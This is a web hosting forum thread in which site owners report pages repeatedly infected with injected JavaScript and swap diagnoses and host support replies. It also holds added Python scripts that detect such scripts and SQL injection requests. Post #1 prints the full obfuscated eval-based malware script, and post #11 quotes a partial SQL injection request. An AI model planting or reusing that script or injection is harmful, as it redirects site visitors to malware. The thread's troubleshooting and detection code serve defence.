| Chit Chat Public Talk about any thing you want! This forum is public. |
#1
Hi everybody,
I have a plan on the server unix28, and all the pages are infected. Although I had fixed everything, reset all the passwords, checked all the source, and even deleted it all, I got infected again. But I also have some track in the page, and it shows that it isn't caused by the source code, because it has nothing inside, just a simple page index.html. Always, after some time, I get the page inserted with a malscript:

<script language=JavaScript> function qibbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,22, 12,11,31,60,26,0,1,53,0,0,0,0,0,0,52,46,47,55,49,2 7,37,21,8,38,3,15,32,61,56,25,2,13,39,36,35,34,58, 28,14,62,20,0,0,0,0,40,0,54,30,7,6,5,51,16,19,43,3 3,17,48,50,9,23,41,59,10,18,29,24,57,4,45,44,42);f or(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(231^j&255);j>>=8 ;d-=2}else{d=6}}}eval(c);}}qibbn15('gVuUJUHSnhvSdXpSZ zQlTUuUPP2CJUHjsz_LnXOmg1pThrNf7BxT81pjrrNDn6_UPzx CedxCPdNDZ1nj6o5ThXvFtT2mdXNLroNUHsHTr4vUssOmnrNSH KnmuJ2fz6NSKIWFHrOUJYyzdXvTnopjnXHUrYyfQoM@G4M9Xf2 lbou@b3uL7f2le42SXXNSKzt9G4MDKr_T7YNS6Ex9o42FhVvUP ztDJVHFoA_jbatUHI_LeRMaHquLG6_UPIQlXJ') </script>

even with just a very simple html page. Did anyone face this too? I am in such a bad situation now. Is there anything that vortech can help with? I asked for support but got nothing but "do it yourself" -> I deleted it all and am still being infected. Damn, what can I do now? Hic hic
#2
Virus problem on unix server
I am having the same problem here. It looks like some kind of script is sitting on the server, and every few minutes it adds a strange javascript at the end or middle of every index.html or index.php file, so when the user accesses this index file in the web browser it tries to redirect the user to an ADWARE site.
At the same time, if someone has antivirus on the PC he cannot view this website because the antivirus blocks this index page. This is a very critical problem and we have been facing it for a few months now. If someone has any suggestion please advise. Temporarily we have created a solution to this problem: a php file that scans all the files in the directory and removes that javascript virus, but this is not a solid solution because the next day the virus program again adds this virus into the index file. I would appreciate it if the server administrator looked into this problem without delay. Thanks
#3
Yes, I had placed a ticket but received nothing much
#4
I am having the same problem too; you can contact me at ambianz @ gmail.com
#5
I've seen that problem several times. Changing all the passwords seemed to help.
#6
Every instance of page defacement I've ever heard of has always been caused by user credentials being compromised or bad application code - never by a server virus.
Places I'd start looking are: anything that allows a user to upload; forms that can accept html; forum software; blog software; flash movies; and then any other software apps I have running. Googling for what is displayed on the page will usually point me to a solution.
Last edited by dpyers : 11-27-2008 at 12:04 PM.
#7
I have the same problem on Unix 17. When I submitted a ticket, I got the reply below.

See the first reply.

Hello,

Your site's security was compromised. This is done through insecure coding you install into the site. We allow you to install your own coding and software, it is isolated to your user environment. It would be impossible for us to protect you from yourself. With the freedom to write and install your own choices of coding comes the responsibility of making sure it is secure. Our servers are set up in a way which makes it impossible for cross account breaches or server wide compromises. Any security compromise is caused by your software, and is hence limited to the resources of your account.

The warning messages you are getting are not necessarily files loaded from the server. People add in, or "inject" bits of code that cause your browser to attempt to fetch the trojan/downloader/viral files from another location. In some rare cases the file is stored encoded or possibly encoded and segmented (where it is not an active threat which would be caught by virus scanning) on the server and the web page coding they inject assembles the files. That is rare; typically the downloaded file comes from elsewhere, and only the JavaScript that fetches the file is injected into your coding.

I would suggest checking the modification dates of your software, and your transaction logs to see when these modifications were made, then removing and replacing all files made after that date. You should also make sure all scripts you use are properly hardened against such injection techniques and all third party software you run is properly updated and patched for its vulnerabilities.

Best Regards,

We fixed it, by deleting and from the server. Checked everything. Uploaded again. It worked for a few days. It again started giving the virus problem. When we submitted a ticket, see the second reply.

Hello,

The site was compromised, likely through some form of JS injection, sql injection, or coding weakness.

You will have to FTP into the site and clean or restore the files back to what they should be, then report it to google that you have fixed the security compromise which leads visitors to an attack page.

Best Regards,

We have tried uploading to a server other than VT, and it works perfectly.
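The cleanup scan from post #2 and the host's advice in post #7 to check modification dates, as an added example (not code from any poster or from the host): a Python scan that flags HTML/PHP files whose inline script shows the decoder traits of the sample in post #1 and lists them by modification time. The heuristic, the function names and the sample site are assumptions constructed for illustration.

```python
import os
import re
import tempfile
import time

# Heuristic (assumption): an inline <script> block that combines eval() with
# character-code decoding, the traits of the script quoted in post #1.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
TRAITS = ("eval(", "String.fromCharCode", "charCodeAt")
WEB_EXT = (".html", ".htm", ".php")

def suspicious_blocks(text):
    """Return the inline script bodies that show every decoder trait."""
    return [m.group(1) for m in SCRIPT_RE.finditer(text)
            if all(t in m.group(1) for t in TRAITS)]

def scan_tree(root):
    """Walk root; return (path, mtime, hit_count) for flagged files, oldest first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_blocks(fh.read())
            if hits:
                findings.append((path, os.path.getmtime(path), len(hits)))
    return sorted(findings, key=lambda f: f[1])

def build_sample_site(root):
    """Constructed sample: one clean page, one with a harmless look-alike block."""
    clean = "<html><body><script>var a = 1;</script>Hello</body></html>"
    injected = clean + ("<script language=JavaScript>function x(p){var c='';"
                        "c+=String.fromCharCode(p.charCodeAt(0));eval(c);}"
                        "x('')</script>")
    for name, body in (("about.html", clean), ("index.html", injected)):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for path, mtime, count in scan_tree(site):
            stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
            print(f"{stamp}  {count} block(s)  {path}")
```

The earliest timestamp in the output is the one to line up against FTP and web access logs; the scan only reports and leaves removal to a restore from known-good copies.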
#8
There might be a worm or virus on your pc that captures the ftp detail. I doubt there is a virus on the web server.
#9
Agree. Far larger chance that it's either coming from your pc or from web software you have that may have a vulnerability - e.g. some versions of forum and blog software allow users to put javascript in posts, which winds up infecting the whole site. To reinstall the defacement, all they need to do is post again.
#10
Actually, the site that has the virus did not have any code, only one html index file. Changing all the passwords (cpanel, ftp, ..) didn't solve it! Then I left it alone. Virus - you do what you want on that server
#11
You sure you don't have a virus on your local machine?
I've had hack attempts on my site and traced them back to a virus/malware that masquerades as a legitimate IE toolbar. Basically it attempts to install itself to every website the user visits using SQL injection. If successful it puts a javascript in your database that redirects to the malware source and the cycle continues.

I had requests that looked like:
/CMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (HUGE DATA HERE)

read more here: http://www.modsecurity.org/blog/arch...jection_a.html

They failed to hack my system... but it was interesting. If this is not the case... and the server is really rooted... then... what can I say but... wow.
__________________
Sorry , Thank You , and You're welcome!
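Detection for the request shape quoted in post #11, as an added example that is not part of any post: a Python pass over web access log lines that percent-decodes each request target and flags the DECLARE ... SET ... CAST( sequence. The Common Log Format layout, the regexes, the function names and the sample lines are assumptions constructed here; the double-encoded variant goes beyond the single request shown in the post.

```python
import re
from urllib.parse import unquote

# Common Log Format (assumed): client ... "METHOD target PROTOCOL" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) [^"]*" (\d{3})')
# After decoding: DECLARE @var <type>; SET @var = CAST(
# i.e. the shape of the request quoted in post #11.
SQLI_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\s*\(\d+\)\s*;\s*SET\s+@\1\s*=\s*CAST\s*\(",
    re.I)

# Constructed sample lines; PLACEHOLDER stands in for the elided payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Nov/2008:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [27/Nov/2008:10:01:05 +0000] "GET /CMS.asp;DECLARE%20@S'
    '%20NVARCHAR(4000);SET%20@S=CAST(PLACEHOLDER) HTTP/1.1" 500 0',
    '198.51.100.7 - - [27/Nov/2008:10:01:09 +0000] "GET /CMS.asp?id=1;declare'
    '%2520@s%2520varchar(8000);set%2520@s=cast(PLACEHOLDER) HTTP/1.1" 404 0',
    '203.0.113.4 - - [27/Nov/2008:10:02:00 +0000] '
    '"GET /search.asp?q=declare+independence HTTP/1.1" 200 900',
]

def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times to catch double-encoded requests."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_sqli_requests(lines):
    """Return (client, status, decoded_target) for each matching request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        decoded = decode_target(target)
        if SQLI_RE.search(decoded):
            hits.append((client, status, decoded))
    return hits

if __name__ == "__main__":
    for client, status, decoded in find_sqli_requests(SAMPLE_LOG):
        print(client, status, decoded[:60])
```

The status code is kept in each result because it separates attempts that errored out from ones that returned 200 and need the database checked for inserted script tags.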